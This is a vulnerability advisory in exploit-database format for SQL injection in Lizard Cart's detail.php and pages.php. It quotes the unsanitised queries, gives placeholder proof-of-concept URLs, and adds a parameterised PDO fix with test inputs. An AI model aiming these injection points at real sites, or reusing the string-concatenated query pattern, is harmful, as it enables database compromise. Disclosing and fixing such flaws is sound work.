Lizard Cart - Multiple SQL Injections
Author: cr4wl3r
type: webapps
platform: php
port:
date_added: 2009-12-18
date_updated: 2011-06-28
verified: 0
codes: CVE-2006-0087;OSVDB-22200;OSVDB-22199
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comlizardcartpp104.zip
################################################################################
## Exploit Title: Lizard Cart Multiple SQL Injection Exploit ##
## Date: 20-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://sourceforge.net/projects/lizardcart/ ##
## Version: N/A ##
## Tested on: GNU/LINUX ##
################################################################################
~ Code [detail.php]
$dbResult = mysql_query("select * from products where id='$id'");
~ PoC
[lizardcart_path]/detail.php?id=[SQL]
~ Code [pages.php]
$dbResult = mysql_query("select * from pages where id='$id'");
~ PoC
[lizardcart_path]/pages.php?id=[SQL]
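
~ Fix (added example, not Lizard Cart code and not from the advisory author)
Both queries above place $id inside the SQL string. The sketch below shows the same lookup with a bound parameter and a table allow-list, using PDO because the mysql_* extension was removed in PHP 7.0. The function name fetch_by_id, the integer-id assumption and the SQLite demo data are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Tables queried by detail.php and pages.php, per the advisory. Identifiers
// cannot be bound as parameters, so the name only ever comes from this list.
const ALLOWED_TABLES = ['products', 'pages'];

/**
 * Hardened form of: select * from <table> where id='$id'
 * Returns the row as an array, or null if the id is invalid or not found.
 * fetch_by_id is a hypothetical helper, not part of Lizard Cart.
 */
function fetch_by_id(PDO $pdo, string $table, $rawId): ?array
{
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException('unexpected table');
    }
    // Assumption: id is a positive integer key. Reject anything else early.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // The value travels as a bound parameter, never as part of the SQL text.
    $stmt = $pdo->prepare("SELECT * FROM {$table} WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO products (id, name) VALUES (1, 'sample item')");

// Constructed inputs standing in for the id request parameter:
// a valid id, an unknown id, and three malformed values.
foreach (['1', '2', "1'", '1 2', ''] as $input) {
    $row = fetch_by_id($pdo, 'products', $input);
    printf("%-8s => %s\n", var_export($input, true), $row ? $row['name'] : 'no row');
}
```

With the MySQL PDO driver, also set PDO::ATTR_EMULATE_PREPARES to false so the statement is prepared on the server.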